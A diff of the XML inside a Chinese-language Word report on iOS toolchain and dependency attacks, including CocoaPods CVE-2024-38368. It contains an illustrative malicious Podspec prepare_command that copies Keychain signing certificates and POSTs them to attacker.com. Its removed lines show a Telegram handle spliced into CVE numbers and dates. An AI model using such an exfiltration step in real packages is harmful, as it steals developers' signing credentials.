       <w:r>
         <w:rPr>
@@ -4015,6 +3998,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4039,6 +4025,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -4062,8 +4051,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc242275486"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc242453622"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4076,7 +4068,7 @@
         </w:rPr>
         <w:t>开发工具链攻击的防御</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -4097,6 +4089,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4168,6 +4166,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4268,6 +4272,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4346,6 +4356,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4439,6 +4455,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4532,6 +4554,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4625,6 +4653,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -4694,60 +4728,60 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc242275487"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc242453623"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>三、依赖管理攻击</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="5"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc242453624"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.1 CocoaPods </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>漏洞（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>CVE-2024-38368</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>）</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc242275488"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.1 CocoaPods </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>漏洞（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>CVE-2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>24-38368</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>）</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4765,19 +4799,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">24 </w:t>
+        <w:t xml:space="preserve">2024 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4799,6 +4821,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4815,22 +4842,15 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>CVE-2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>24-38368</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>CVE-2024-38368</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4870,6 +4890,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4885,6 +4910,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4949,6 +4979,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">1. </w:t>
@@ -4982,6 +5015,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">2. </w:t>
@@ -5015,6 +5051,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">3. </w:t>
@@ -5084,6 +5123,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">4. </w:t>
@@ -5123,6 +5165,9 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="280" w:hanging="280"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">5. </w:t>
@@ -5142,6 +5187,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5154,6 +5204,49 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>恶意</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Podspec </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>中的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> prepare_command</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5165,38 +5258,32 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>spec.prepare_command = &lt;&lt;-CMD</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>恶意</w:t>
+        <w:t xml:space="preserve">  # </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Podspec </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>中的</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> prepare_command</w:t>
+        <w:t>窃取开发者签名证书</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5211,7 +5298,7 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t>spec.prepare_command = &lt;&lt;-CMD</w:t>
+        <w:t xml:space="preserve">  cp ~/Library/Keychains/*.cert /tmp/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5223,65 +5310,33 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  # </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>窃取开发者签名证书</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve">  curl -X POST https://attacker.com/steal -d @/tmp/*.cert</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">  cp ~/Library/Keychains/*.cert /tmp/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:sz w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  curl -X POST https://attacker.com/steal -d @/tmp/*.cert</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
         <w:t>CMD</w:t>
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5300,6 +5355,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5329,19 +5387,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>&gt;7</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">% </w:t>
+        <w:t xml:space="preserve">&gt;70% </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5366,6 +5412,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5402,6 +5451,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5411,6 +5463,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5429,24 +5486,15 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>CocoaPods 1.15.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>t.me/one00190</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">+ </w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CocoaPods 1.15.0+ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5459,6 +5507,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5483,6 +5534,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5506,8 +5560,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc242275489"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc242453625"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5520,9 +5577,14 @@
         </w:rPr>
         <w:t>攻击面</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5548,11 +5610,15 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">SPM </w:t>
       </w:r>
       <w:r>
@@ -5590,6 +5656,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -5713,6 +5782,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -5746,6 +5820,12 @@
         <w:gridCol w:w="3057"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -5817,6 +5897,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -5903,6 +5989,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -5982,6 +6074,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -6047,6 +6145,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1667" w:type="pct"/>
@@ -6135,6 +6239,11 @@
     </w:tbl>
     <w:p/>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6153,6 +6262,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6261,6 +6373,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6273,6 +6388,9 @@
       <w:pPr>
         <w:pStyle w:val="a"/>
         <w:ind w:left="420" w:hanging="420"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6296,8 +6414,11 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc242275490"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc242453626"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6322,9 +6443,14 @@
         </w:rPr>
         <w:t>应用）</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6340,6 +6466,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6402,6 +6533,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -6436,6 +6572,12 @@
         <w:gridCol w:w="2294"/>
       </w:tblGrid>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6530,6 +6672,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6566,19 +6714,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>18-11</w:t>
+              <w:t>2018-11</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6640,6 +6776,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6676,31 +6818,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>21-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2021-03</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6762,6 +6880,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
+          </w:tblCellMar>
+        </w:tblPrEx>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="1250" w:type="pct"/>
@@ -6798,31 +6922,7 @@
               <w:rPr>
                 <w:sz w:val="18"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>22-</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>t.me/one00190</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>3</w:t>
+              <w:t>2022-03</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6884,6 +6984,12 @@
         </w:tc>
       </w:tr>
       <w:tr>
+        <w:tblPrEx>
+          <w:tblCellMar>
+            <w:top w:w="0" w:type="dxa"/>
+            <w:bottom w:w="0" w:type="dxa"/>
